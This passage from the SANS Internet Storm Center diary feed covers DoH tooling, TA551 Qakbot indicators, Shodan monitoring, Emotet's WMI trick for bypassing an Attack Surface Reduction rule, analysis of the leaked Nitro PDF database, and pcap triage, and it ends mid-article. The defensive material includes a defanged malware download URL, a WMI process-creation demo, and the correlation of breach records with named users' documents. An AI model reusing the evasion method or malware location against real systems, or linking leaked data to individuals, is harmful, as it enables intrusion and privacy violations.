Channel: SANS Internet Storm Center, InfoCON: green

ISC Stormcast For Monday, January 25th, 2021 https://isc.sans.edu/podcastdetail.html?id=7342, (Mon, Jan 25th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Fun with NMAP NSE Scripts and DOH (DNS over HTTPS), (Mon, Jan 25th)


DOH (DNS over HTTPS) has been implemented in the major browsers over the last year or so, and there's a fair amount of support for it on public DNS services.  Because it's encrypted and over TCP, the mantra of "because privacy" seems to have carried the day.  But why do network and system admins hate it so?

First of all, any name resolution that goes outside the organization, especially if it's encrypted, can't be easily logged.  I get that this is the entire point, but there are several attacks that can be prevented with simple DNS monitoring and sink-holing (blocking known malicious domains), and several attacks that can be mounted using just DNS (delivering malware via DNS TXT records for instance).   

What about DNS Tunneling you ask?  DNS tunnelling over DOH seems like a bit of a silly exercise - unless you're decrypting at your perimeter, DNS tunnelling over DOH is just going to look like HTTPS - you might as well just use HTTPS.

Why do privacy advocates tend to lose this debate at work?

For starters, the expectation of 100% privacy, combined with the desire to hold IT and Security folks accountable for any breach or security incident while you've got their hands tied, doesn't hold water.  Especially for decryption, most organizations have broad exceptions by category - for instance, most organizations will not decrypt or inspect banking or financial information, interaction with government sites (taxes and so on), or healthcare sites of any kind.  Believe me, we don't want your banking password any more than we want your AD password!  So out of the gate, both the written and technical policies around decryption for most organizations focus on the individual's privacy - the goal is normally to protect against malware and attacks, HR violations (adult sites for instance), and illegal activity that could put the organization in jeopardy.

Also, the phrase "expectation of privacy" is key here.  If you are at work, you don't usually have that - you're using the organization's systems and resources, and going about the business of the organization, and you've likely signed an Acceptable Use Policy (or something that covers that same ground) to that effect.  This protects you in that it defines what monitoring the company does, and protects the company in case any of its employees do anything illegal while at work.  Note that I am not a lawyer, nor do I play one on TV .. but I have been involved in more than a few "illegal stuff at work" cases over the years (thankfully not as a direct participant) - this stuff is important for both the company and the individuals!

So, with all the politics done, what does a DOH request look like?  The simple approach is to use the dns-json method, as outlined below - it'll save you base64 encoding the requests.  Let's start with a raw request in curl, then refine it a bit:

JSON-formatted data:

curl -s -H 'accept: application/dns-json' 'https://1.1.1.1/dns-query?name=www.cisco.com&type=AAAA'
{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"www.cisco.com","type":28}],"Answer":[{"name":"www.cisco.com","type":5,"TTL":3600,"data":"www.cisco.com.akadns.net."},{"name":"www.cisco.com.akadns.net","type":5,"TTL":300,"data":"wwwds.cisco.com.edgekey.net."},{"name":"wwwds.cisco.com.edgekey.net","type":5,"TTL":21600,"data":"wwwds.cisco.com.edgekey.net.globalredir.akadns.net."},{"name":"wwwds.cisco.com.edgekey.net.globalredir.akadns.net","type":5,"TTL":3600,"data":"e2867.dsca.akamaiedge.net."},{"name":"e2867.dsca.akamaiedge.net","type":28,"TTL":20,"data":"2600:1408:5c00:3bc::b33"},{"name":"e2867.dsca.akamaiedge.net","type":28,"TTL":20,"data":"2600:1408:5c00:388::b33"}]}

Looks pretty straightforward - very much like any API that you might be used to.  DOH is an HTTPS request like any other, but with a specific Accept header and a specific path on the target server (dns-query).  This raw output is great if you're a Python script, but let's fix up the formatting a bit so it's a bit more "human readable".

curl -s -H 'accept: application/dns-json' 'https://1.1.1.1/dns-query?name=www.cisco.com&type=AAAA' | jq
{
  "Status": 0,
  "TC": false,
  "RD": true,
  "RA": true,
  "AD": false,
  "CD": false,
  "Question": [
    {
      "name": "www.cisco.com",
      "type": 28
    }
  ],
  "Answer": [
    {
      "name": "www.cisco.com",
      "type": 5,
      "TTL": 3597,
      "data": "www.cisco.com.akadns.net."
    },
    {
      "name": "www.cisco.com.akadns.net",
      "type": 5,
      "TTL": 297,
      "data": "wwwds.cisco.com.edgekey.net."
    },
    {
      "name": "wwwds.cisco.com.edgekey.net",
      "type": 5,
      "TTL": 21597,
      "data": "wwwds.cisco.com.edgekey.net.globalredir.akadns.net."
    },
    {
      "name": "wwwds.cisco.com.edgekey.net.globalredir.akadns.net",
      "type": 5,
      "TTL": 3597,
      "data": "e2867.dsca.akamaiedge.net."
    },
    {
      "name": "e2867.dsca.akamaiedge.net",
      "type": 28,
      "TTL": 17,
      "data": "2600:1408:5c00:388::b33"
    },
    {
      "name": "e2867.dsca.akamaiedge.net",
      "type": 28,
      "TTL": 17,
      "data": "2600:1408:5c00:3bc::b33"
    }
  ]
}


Now with just the data values parsed out:

curl -s -H 'accept: application/dns-json' 'https://1.1.1.1/dns-query?name=www.cisco.com&type=AAAA' | jq | grep data | tr -s " " | cut -d " " -f 3 | tr -d \"

www.cisco.com.akadns.net.
wwwds.cisco.com.edgekey.net.
wwwds.cisco.com.edgekey.net.globalredir.akadns.net.
e2867.dsca.akamaiedge.net.
2600:1408:5c00:3bc::b33
2600:1408:5c00:388::b33
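If you'd rather make the same query from a script instead of shelling out to curl, here's a minimal Python sketch (assuming the third-party "requests" library is installed) that issues the identical dns-json request:

#!/usr/bin/env python3
# Minimal DoH lookup using the dns-json format - the Python equivalent of the
# curl examples above. Assumes "requests" is installed (pip install requests).
import requests

def doh_query(name, rrtype="AAAA", server="1.1.1.1"):
    # DoH with the JSON format is just an HTTPS GET against /dns-query
    # with an "accept: application/dns-json" header
    resp = requests.get(
        "https://{}/dns-query".format(server),
        params={"name": name, "type": rrtype},
        headers={"accept": "application/dns-json"},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()

if __name__ == "__main__":
    for rr in doh_query("www.cisco.com", "AAAA").get("Answer", []):
        print(rr["name"], rr["type"], rr["data"])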

This is all well and good for a shell script, but if you need to test more servers, what other tools can you use?  With the emphasis on scripting and testing multiple servers, I wrote a short NSE script for NMAP that will make arbitrary DOH requests:

First of all, the syntax is:

nmap -p443 <DNS server> --script=dns-doh --script-args query=<query type>,target=<DNS lookup value>

>nmap -p 443 --script=dns-doh 1.1.1.1 --script-args query=A,target=isc.sans.edu

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-25 12:04 Eastern Standard Time
Nmap scan report for one.one.one.one (1.1.1.1)
Host is up (0.027s latency).

PORT    STATE SERVICE
443/tcp open  https
| dns-doh:
|   Answer:
|
|       type: 1
|       name: isc.sans.edu
|       TTL: 7
|       data: 45.60.103.34
|
|       type: 1
|       name: isc.sans.edu
|       TTL: 7
|       data: 45.60.31.34
|   AD: false
|   Status: 0
|   RA: true
|   Question:
|
|       type: 1
|       name: isc.sans.edu
|   CD: false
|   RD: true
|_  TC: false

Nmap done: 1 IP address (1 host up) scanned in 9.08 seconds

Looking at the code (comments are in-line), after all the setup and syntax checking, this is essentially a 3 line script:

local nmap = require "nmap"
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local json = require "json"
local strbuf = require "strbuf"

description = [[
Performs a DOH lookup against the target site
variables: t = <target of dns query>
           q = <dns query type>
]]
---
-- @usage
-- nmap <target> --script=doh <DNS server> --script-args query=<query type>,target=<DNS lookup value>
--
-- @output
-- 443/tcp open   https
-- | results of query
--
---
author = {"Rob VandenBrink","rob@coherentsecurity.com"}
license = "Creative Commons https://creativecommons.org/licenses/by-nc-sa/4.0/"
categories = { "discovery" }

portrule = shortport.http

action = function(host,port)
     -- collect the command line arguments
     local query = stdnse.get_script_args('query')
     local target = stdnse.get_script_args('target')
     -- input checking - check that both arg values are present and non-zero
     if(query==nil or query == '') then
         return "DNS query operation is not defined (A,AAAA,MX,PTR,TXT etc)"
     end
     if(target==nil or target=='') then
         return "DNS target is not defined (host, domain, IP address etc)"
     end
     -- construct the query string, the path in the DOH HTTPS GET
     local qstring = '/dns-query?name='..target..'&type='..query
     -- define the header value (which defines the output type)
     local options = {header={}}
     options['header']['accept'] = 'application/dns-json'
     -- Get some DOH answers!
     local response = http.get(host.ip, port.number, qstring, options)
     -- convert results to JSON for more legible output
     local stat, resp = json.parse(response.body)
     return resp
end

 

The dns-doh.nse script is available and is maintained at: https://github.com/robvandenbrink/dns-doh.nse

If you find any issues with this code, by all means use our comment section to report them, or ping me via git

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Tuesday, January 26th, 2021 https://isc.sans.edu/podcastdetail.html?id=7344, (Tue, Jan 26th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TA551 (Shathak) Word docs push Qakbot (Qbot), (Tue, Jan 26th)


Introduction

Late last week, we saw new samples of Word documents from TA551 (Shathak) pushing malware.  This actor was active up through 2020-12-18 pushing IcedID malware before going on break for the holidays.  Now that it's returned, TA551 has been pushing Qakbot (Qbot) malware instead of IcedID.


Shown above: flow chart for recent TA551 (Shathak) activity so far in January 2021.

Images from the infection

See below for images associated with the infection in my lab environment.


Shown above:  Screenshot of the TA551 (Shathak) Word document with macros for Qakbot (Qbot).


Shown above:  Regsvr32 pop-up message when the malware DLL to install Qakbot has successfully run.


Shown above:  Start of TCP stream showing the HTTP request and response for the initial DLL to install Qakbot (Qbot).


Shown above:  Traffic from the infection filtered in Wireshark (part 1).


Shown above:  Traffic from the infection filtered in Wireshark (part 2).


Shown above:  Traffic from the infection filtered in Wireshark (part 3).


Shown above:  One of the emails exported from the pcap (a copy is available here).

Notes

This month, the affiliate or campaign identification string for Qakbot malware distributed through TA551 has been krk01.  When my krk01 Qakbot-infected host started spamming more Qakbot, the affiliate/campaign ID for Qakbot samples caused by this malspam was abc120.

Because of this and its previous history pushing different families of malware, I believe TA551 (Shathak) is a distributor for other criminals in our cyber threat landscape.  The other criminals push malware (like the criminals behind Qakbot), while TA551 is specifically a distribution network.

Indicators of Compromise (IOCs)

SHA256 hash: 17cd3c11fba639c1fe987a79a1b998afe741636ac607254cc134eea02c63f658

  • File size: 76,663 bytes
  • File name: particulars-01.26.21.doc
  • File description: TA551 (Shathak) Word doc with macros for Qakbot (Qbot)

SHA256 hash: 231b081480a80b05d69ed1d2e18ada8a1fd85ba6ce3e69cc8f630ede5ce5400e

  • File size: 888,832 bytes
  • File location: hxxp://5that6[.]com//assets/55ddb775/ce51025b12/9b75bbce/8a06fd47/6ac84e7424b0539286562b/xtuaq14?anz=125c5909&dlzwg=7aec167a5a2ab0&bu=a09f740
  • File location: C:\ProgramData\aZe4I.tmp
  • File description: Windows malware DLL retrieved by Word macro, used to install Qakbot (Qbot) affiliate/campaign ID krk01
  • Run method:  regsvr32.exe [filename]

Final words

A pcap of the infection traffic and malware from the infected Windows host can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Wednesday, January 27th, 2021 https://isc.sans.edu/podcastdetail.html?id=7346, (Wed, Jan 27th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TriOp - tool for gathering (not just) security-related data from Shodan.io (tool drop), (Wed, Jan 27th)


If you’re a regular reader of our Diaries, you may remember that over the last year and a half, a not insignificant portion of my posts has been devoted to discussing some of the trends in internet-connected systems. We looked at changes in the number of internet-facing machines affected by BlueKeep[1], SMBGhost[2], Shitrix[3] and several other vulnerabilities [4], as well as at the changes in TLS 1.3 support over time[5] and several other areas [6,7].  Today, we’re going to take a look at the tool that I’ve used to gather the data from Shodan.io on which those Diaries were based.

In keeping with the Shodan theme, I’ve called the tool TriOp. It is a Python script that enables you to quickly build a list (or multiple lists) of Shodan search terms and then repeatedly (e.g. once every day) get the count of public IPs that satisfy each of them from the Shodan API.

The basic use of the tool is quite straightforward – in addition to creating a Shodan account and getting its API key, one only needs to create a list of Shodan queries one wishes to monitor over time, input this list into TriOp (as a CSV file where the first row specifies the queries or through a command line as a comma-separated list) and the tool will do the rest. It can output the results of the queries to command line, but its more useful feature is the option to save the results in a CSV, which can later be used as an input for TriOp.

 

The basic search can be done using the -s/--search option in the following way:

triop.py -s "port:80,port:443"

In such a case, the output might look like this:

TriOp 1.0
Current IP count for query port:80 is 72010982
Current IP count for query port:443 is 59072465

Where things get interesting is the output to a file using the -O/--output_file option:

triop.py -s "port:80,port:443" -O http_ports.csv

The resultant CSV file would have the following structure:

Date,2021-01-26
port:80, 72036704
port:443, 59145503

You can probably see why using the same file as input on another day might be useful. If one were to use this file as an input today using the -S/--search_file option and add the -a/--append option, TriOp would add another column to the file with today’s date and the current counts.

triop.py -S http_ports.csv -a

The updated CSV file would then look like this:

Date,2021-01-26,2021-01-27
port:80,72036704,72010982
port:443,59145503,59072465

If one wanted to monitor the situation on a day to day basis, one would only need to run the same command each day (preferably using some automatic scheduling mechanism).
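Under the hood, this boils down to asking the Shodan API for a “count” for each query and recording it next to a date. As a rough illustration (this is just a sketch of the idea, not TriOp itself), the same thing can be done in a few lines with the official shodan Python library and a placeholder API key:

#!/usr/bin/env python3
# Sketch of the idea behind TriOp (not TriOp itself): fetch Shodan "counts"
# for a list of queries and write them to a dated CSV. Assumes the official
# "shodan" library is installed (pip install shodan).
import csv
import datetime
import shodan

API_KEY = "YOUR_SHODAN_API_KEY"   # placeholder - use your own key
QUERIES = ["port:80", "port:443"]

api = shodan.Shodan(API_KEY)
rows = [["Date", datetime.date.today().isoformat()]]
for query in QUERIES:
    # count() returns only totals/facets, so it works even with a free API key
    rows.append([query, api.count(query)["total"]])

with open("http_ports.csv", "w", newline="") as f:
    csv.writer(f).writerows(rows)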

Although gathering data about the number of public IPs with different ports open to the internet may be interesting, as it gives us some idea about how the global network changes over time[8], we are certainly not limited to just the “port:” filter.

Since TriOp only gets a "count" for each of the queries and not the related list of IP addresses that satisfy the queries, one may use any combination of Shodan search filters with it (even those that are normally accessible only to enterprise or researcher-level accounts), even with a free account.

This means that one may use TriOp to monitor the changes in different open ports in specific IP ranges (filter “net:”), ASNs (filter “asn:”) or countries (filter “country:”), but also to monitor changes in the number of IPs affected by specific vulnerabilities (filter “vuln:”), systems with specific JARM[9] fingerprints (filter “ssl.jarm:”), etc.

Since we’ve mentioned vulnerabilities, if this is an area that interests you, you may also use TriOp as a high-level “passive” vulnerability scanner. Shodan itself detects machines affected by some vulnerabilities – currently it seems to be able to identify about 2246 of the approximately 190k CVEs published so far, according to the results of my tests[10] – and nothing is stopping us from getting the “count” for these. A list of the CVEs “supported” by Shodan, which I’ve been able to identify, is included in TriOp, and one may search for them simply by using any query in combination with the --vuln_search_level option:

triop.py -s "country:US" --vuln_search_level 3

The previous command would result in a very long output giving us the number of public IPs in the US, on which systems vulnerable to specific CVEs might be found:

TriOp 1.0
Checking whether Shodan detects any vulnerabilities for search country:US.
Current IP count for query country:US has_vuln:true is 10398899
Current IP count for query country:US is 160792718
Current IP count for query country:US vuln:CVE-1999-0045 is 1
...

The tool has additional features as well (adding new queries to existing search files, exporting data related to similar searches from multiple search files, etc.) and you may find some of them demonstrated in the tutorial video below.

The one last feature I will mention here is the ability to load multiple input files based on a specified “mask”. I originally created TriOp with the intention of monitoring changes in the number of vulnerable systems, ports and services both globally and in different countries, and I’ve created over a hundred different search files by now (one for each country I was interested in, several for different sets of vulnerabilities, etc.). In order to be able to “update” each of them on a daily basis, TriOp supports the --filename_load option, which enables one to specify a string that is then used to select the files which should be used as inputs. If one were to use the following mask, for example, all CSV files in the current folder would be used as inputs and consequently updated.

triop.py --filename_load .csv -a

As you may see, although TriOp is a fairly simple tool that only gathers “counts” for each of the submitted queries, its outputs can be quite useful. This goes especially for any (national) CSIRT that wants to monitor the public IPs of its constituency but lacks the capability to scan them on a daily basis, or for any security researcher who wants to, for example, compare the number of devices affected by specific vulnerabilities in different countries.

In any case, if you’d like to try TriOp yourself, you may download it from my GitHub page.

[1] https://isc.sans.edu/diary/25506
[2] https://isc.sans.edu/diary/26732
[3] https://isc.sans.edu/diary/26900
[4] https://isc.sans.edu/diary/26798
[5] https://isc.sans.edu/diary/26936
[6] https://isc.sans.edu/diary/25854
[7] https://isc.sans.edu/diary/26374
[8] https://untrustednetwork.net/en/2021/01/01/open-ports-statistics-for-2020/
[9] https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a
[10] https://untrustednetwork.net/en/2020/11/18/most-common-vulnerabilities-based-on-shodan/

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Emotet vs. Windows Attack Surface Reduction, (Thu, Jan 28th)


Emotet malware in the form of malicious Word documents continued to make the rounds over the past weeks, and the samples initially often had pretty poor anti-virus coverage (Virustotal). The encoding used by the maldoc is very similar to what Didier Stevens analyzed in his recent diary, and the same method can be used to extract the mal-code from the current Emotet docs.

With the de-obfuscation reasonably straightforward, I proceeded to look into how the malware crooks accomplish execution from within the Word doc, and in particular, why Microsoft's "Attack Surface Reduction Rules" do not seem to help much.

But first, let's take a quick detour into what Attack Surface Reduction (ASR) promises to do on modern Windows devices. ASR is a somewhat clunky set of additional protections in Microsoft Defender Antivirus that can be turned on to log or intercept (block) some common attack scenarios. Microsoft's web site offers meager documentation, including a marginally helpful list of GUIDs that can be used to activate the feature.

One rule, "Block all Office Applications from creating child processes" (GUID D4F940AB-401B-4EFC-AADC-AD5F3C50688A) is supposed to prevent a Word document from launching any other task. Therefore, when this rule is configured, we would expect that the current Emotet and its execution chain of Word-Doc -> cmd.exe -> Powershell should not be successful. But it is.

Closer inspection of the Defender Event Log gives a hint "why": 

The only ASR rule that we see firing when the Emotet doc is being opened is the one with ID d1e49aac-8f56-4280-b9ba-993a6d77406c, corresponding to "Block process creations originating from PSExec and WMI commands". Yes, the Emotet VBA macro is using a WMI (Windows Management Instrumentation) call to launch the subsequent attack code. For such a WMI invocation via the Win32_Process class, the parent process of "cmd" ends up being WmiPrvSe.exe, which in turn is launched from "svchost". Therefore, "cmd" is not a child process of Word, and the ASR block rule to prevent child processes of Word consequently doesn't trigger. Bah!
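You can reproduce the parentage trick on a test VM without the maldoc - any process created through WMI's Win32_Process class shows the same behaviour. A minimal Python sketch (Windows only, assuming the third-party "wmi" package is installed):

# Illustration only - run this in a test VM, not in production.
# Processes created via WMI's Win32_Process class become children of
# WmiPrvSE.exe rather than of the calling process, which is exactly why
# the "block Office child processes" ASR rule never sees them.
# Assumes the third-party "wmi" package (pip install wmi).
import wmi

c = wmi.WMI()
pid, ret = c.Win32_Process.Create(CommandLine="notepad.exe")
print("Created PID {} via WMI, return code {}".format(pid, ret))
# Check the new notepad.exe in Process Explorer: its parent is WmiPrvSE.exe
# (under svchost), not python.exe.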

In corporate environments, remote management of user devices often uses tools like SCCM or Endpoint Manager, which in turn rely on WMI to function. Therefore, setting the ASR Rule for WMI/PSExec to "block" will likely break device management, and cause a huge mess. Chances are, the Emotet crooks were fully aware of this, and that's exactly why they chose this particular execution method for their attack code.

If you have Microsoft ATP, you can also use a hunting rule like this to search for WMI process creation:

DeviceEvents
| where ActionType == "ProcessCreatedUsingWmiQuery"
| project Timestamp, DeviceName, ActionType, FileName, SHA1, FolderPath, InitiatingProcessCommandLine, ProcessCommandLine
| sort by Timestamp desc

You might have to add a couple of exclusions to cover your management instrumentation or software distribution tools, but with a bit of tuning, you should see any current Emotet-like WMI attempts in your environment. The ProcessCommandLine in these cases will be long (>600 chars) and contain Base64-encoded Powershell, and the InitiatingProcess is Winword.
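If you want to see what one of those encoded commands actually runs, PowerShell's -EncodedCommand argument is just Base64 over UTF-16LE text, so a couple of lines of Python will decode it:

# Decode a PowerShell -EncodedCommand blob (Base64 of UTF-16LE text).
import base64

def decode_powershell(blob):
    return base64.b64decode(blob).decode("utf-16-le")

# Round-trip demo so you can verify the decoder works:
demo = base64.b64encode("ping 127.0.0.1".encode("utf-16-le")).decode()
print(decode_powershell(demo))   # -> ping 127.0.0.1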

In the meantime, probably the best bet to protect your Windows users against Emotet and similar malware remains to quarantine password-protected zips or Office documents with macros on your email gateway, or to disable macros within Office outright if you can get away with it.

Maybe, in a decade or three, Microsoft will get to the point where malware introduced via Office documents really no longer is a concern and prevalent problem. Until then, I guess we have to kinda hope that today's international raid by law enforcement against the Emotet gang really got the right guys, and got them good.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Thursday, January 28th, 2021 https://isc.sans.edu/podcastdetail.html?id=7348, (Thu, Jan 28th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Friday, January 29th, 2021 https://isc.sans.edu/podcastdetail.html?id=7350, (Fri, Jan 29th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Sensitive Data Shared with Cloud Services, (Fri, Jan 29th)


Yesterday was Data Protection Day in Europe[1]. I was not on duty, so I’m writing this quick diary a bit late. Back in 2020, the Nitro PDF service suffered from a data breach that impacted many companies around the world. This popular service allows you to create, edit and sign PDF documents. A few days ago, the database leak was released in the wild[2]: 14GB compressed, 77M credentials.

I had the opportunity to have a look at the data and it provides really interesting information. The archive contains dumps of SQL tables from a relational database. We have a file with the users' data. The classic email addresses and passwords (thankfully hashed) are present, but also a user ID. A second file is the dump of a SQL table containing information about documents processed with Nitro PDF. Because it’s a relational database, we can use the user's ID to find who worked on which document(s) and when (because timestamps are also present). The information you have about each document is the title and a thumbnail reference (thankfully not available). Example:

114193114       2013-10-28 21:46:21.765 2013-10-28 21:46:22.62  f       5430610411990818132     f       nitrocloud-prod|437b88f9-3f81-4952-9ec4-
97d8524a890e    Concept Note    \N      f       f       \N      114193118       \N

"114193114" is the user ID, "Concept Note" is the document title.

I did some correlation searches for my customers and I was able to match which user was working on a specific document at a specific time.

From a broader point of view, can we guess the type of data that was exchanged via this cloud service? I extracted all the document titles, performed some cleanup, and extracted a word list to generate this word cloud:

As you can see, many words look "juicy" and are directly related to business activities! By linking document titles with email addresses we learn about potential victims who could be interesting targets for social engineering or phishing attacks! 
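For reference, a minimal sketch of generating such a word cloud from a list of extracted titles (the input file name is hypothetical, and the "wordcloud" and "matplotlib" packages are assumed to be installed):

#!/usr/bin/env python3
# Generate a word cloud from a file of document titles, one title per line.
# Assumes "wordcloud" and "matplotlib" are installed
# (pip install wordcloud matplotlib); "titles.txt" is a hypothetical file name.
from wordcloud import WordCloud
import matplotlib.pyplot as plt

with open("titles.txt") as f:
    text = f.read()

cloud = WordCloud(width=1200, height=600, background_color="white").generate(text)
plt.imshow(cloud, interpolation="bilinear")
plt.axis("off")
plt.savefig("titles-wordcloud.png", dpi=150, bbox_inches="tight")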

Always be aware that cloud services store a lot of information that you don't really want to see out of your perimeter!

[1] https://www.coe.int/en/web/portal/28-january-data-protection-day
[2] https://www.bleepingcomputer.com/news/security/hacker-leaks-full-database-of-77-million-nitro-pdf-user-records/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 3.2.11 is now available which contains Bug Fixes - https://www.wireshark.org, (Sat, Jan 30th)


-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

PacketSifter as Network Parsing and Telemetry Tool, (Sat, Jan 30th)


I saw PacketSifter[1], a new package on GitHub, and figured I would give it a try to test its functionality. It is described as "PacketSifter is a tool/script that is designed to aid analysts in sifting through a packet capture (pcap) to find noteworthy traffic. Packetsifter accepts a pcap as an argument and outputs several files." It is less than a month old, with an initial release on 31 Dec 2020 and the last update 22 days ago.

What I found interesting about this tool is that it uses various tshark filters to parse the information into various types of statistics (conversations & endpoints) such as IP, TCP and HTTP, presenting the data in a way that can be easily understood and easily searched using various regex tools. I use Elasticsearch to collect, parse and analyze my logs, but I also see PacketSifter as an alternative to quickly summarize packet data.

The result of the dns.pcap was a list of malformed DNS packets and the http.pcap was all the web traffic saved into a single file.

One of the requirements for this tool is you need to have tshark installed. My test was done with the latest version of CentOS 7.

Download the tool from GitHub, which also contains the VirusTotal setup file. Ensure the system meets the following requirements:

  • Tshark[2] installed
  • VirusTotal[4] API key
  • curl (to make web requests) and jq

$ git clone https://github.com/packetsifter/packetsifterTool.git
$ cd packetsifterTool
$ chmod 555 packetsifter.sh
$ sh VTInitial.sh

Note: This file only contains web and DNS traffic

$./packetsifter.sh ../honeypot-2021-Jan-29-19-25-42.pcap

  • Would you like to resolve host names observed in pcap? This may take a long time depending on the pcap!!

<<Warning>> This can result in DNS queries for attacker infrastructure. Proceed with caution!!
(Please supply Y for yes or N for no) N

http.pcap contains all conversations containing port 80,8080,8000
Running as user "root" and group "root". This could be dangerous.

  • Would you like to export HTTP objects? The objects will be outputted to a tarball in the current directory titled: httpObjects.tar.gz

<<Warning>> There could be a lot of HTTP objects and you can potentially extract malicious http objects depending on the pcap. Use with caution!!
(Please supply Y for yes or N for no) Y

  • Would you like to lookup exported HTTP objects using VirusTotal?

**Warning** You must have ran the VTinitial.sh script to initialize PacketSifter with your VirusTotal API Key.
(Please supply Y for yes or N for no) Y

################# SMB SIFTING #################

Stats on commands ran using smb or smb2 has been generated and is available in: SMBstatistics.txt

No SMB traffic found. Deleting arbitrary SMBstatistics.txt
smb.pcap contains all conversations categorized by tshark dissectors as NBSS, SMB, or SMB2
Running as user "root" and group "root". This could be dangerous.

No SMB traffic found. Deleting arbitrary smb.pcap.

  • Would you like to export SMB objects? The objects will be outputted to a tarball in the current directory titled: smbObjects.tar.gz

<<Warning>> There could be a lot of SMB objects and you can potentially extract malicious SMB objects depending on the pcap. Use with caution!!
(Please supply Y for yes or N for no) N

################# DNS SIFTING #################

dns.pcap contains all conversations categorized by tshark dissectors as DNS
Running as user "root" and group "root". This could be dangerous.

DNS A query/responses have been outputted to dnsARecords.txt
No DNS A records found. Deleting arbitrary dnsARecords.txt

DNS TXT query/responses have been outputted to dnsTXTRecords.txt. DNS TXT records can be used for nefarious reasons and should be glanced over for any abnormalities.
No DNS TXT records found. Deleting arbitrary dnsTXTRecords.txt

################# FTP SIFTING #################
ftp.pcap contains all conversations categorized by tshark dissectors as FTP
Running as user "root" and group "root". This could be dangerous.
No FTP traffic found. Deleting arbitrary ftp.pcap

Packet sifting complete! Thanks for using the tool.

After the tool completed its analysis, a total of 7 files were generated by the script: 2 pcap and 5 text:

[guy@moonbase packetsifterTool]$ ls -1 *.txt && ls -1 *.pcap

  • errors.txt
  • http_info.txt
  • IOstatistics.txt
  • IPstatistics.txt
  • TCPstatistics.txt
  • dns.pcap
  • http.pcap

The script is using tshark to provide various statistics such as:

  • HTTP/Packet Counter

  • HTTP/Requests
  • HTTP/Load Distribution

  • HTTP Responses by Server Address
  • TCP Endpoint Statistics
  • IP Endpoint Statistics

It extracts all the web objects into this file: httpObjects.tar.gz
$ tar zxvf httpObjects.tar.gz
$ cd httpObjects
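If you want to slice the sifted output a bit further yourself, the same tshark install that PacketSifter requires can be driven from Python via pyshark. A minimal sketch (assuming pyshark is installed) that counts HTTP requests per Host header in the generated http.pcap:

#!/usr/bin/env python3
# Count HTTP requests per Host header in a pcap. Assumes the third-party
# "pyshark" package is installed (pip install pyshark); it drives the same
# tshark that PacketSifter already requires.
from collections import Counter
import pyshark

hosts = Counter()
cap = pyshark.FileCapture("http.pcap", display_filter="http.request")
for pkt in cap:
    # some requests may lack a Host header, so fall back gracefully
    hosts[getattr(pkt.http, "host", "(no Host header)")] += 1
cap.close()

for host, count in hosts.most_common():
    print("{:6d}  {}".format(count, host))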

This script goes through the pcap file quickly; however, there is a warning for "Would you like to resolve host names observed in pcap?". The first time, I said yes and that basically stalled the script while it was trying to resolve hostnames - I eventually cancelled it and re-ran it without that option.

Overall, this script is easy to use and is another tool that can easily be used to analyze pcap traffic for web, DNS and SMB objects (the latter of which I didn't have in this capture).

Happy hunting!

[1] https://github.com/packetsifter/packetsifterTool.git
[2] https://www.wireshark.org
[3] https://tshark.dev/setup/install/
[4] https://www.virustotal.com/gui//
[5] https://www.elastic.co

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA v4.0.4, (Sun, Jan 31st)

Wireshark 3.4.3 Released, (Sun, Jan 31st)


Wireshark version 3.4.3 was released.

For Windows users, Npcap 1.10 replaces version 1.00.

 

It has vulnerability and bug fixes, like a USB HID dissector crash & memory leak.

 

Didier Stevens

Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Monday, February 1st, 2021 https://isc.sans.edu/podcastdetail.html?id=7352, (Mon, Feb 1st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Taking a Shot at Reverse Shell Attacks, CNC Phone Home and Data Exfil from Servers, (Mon, Feb 1st)


Over the last number of weeks (after the Solarwinds Orion news) there's been a lot of discussion on how to detect if a server-based application is compromised.  The discussions have ranged from buying new sophisticated tools, auditing the development pipeline, to diffing patches.  But really, for me it's as simple as saying "should my application server really be able to connect to any internet host on any protocol?".  Let's take it one step further and say "should my application server really be able to connect to arbitrary hosts on tcp/443 or udp/53 (or any other protocol)?".  And when you phrase it that way, the answer really should be a simple "no".

For me, fixing this should have been a simple thing.  Let's phrase this in the context of the CIS Critical Controls (https://www.cisecurity.org/controls/)
CC1: server and workstation inventory
CC2: software inventory 
(we'll add more later)

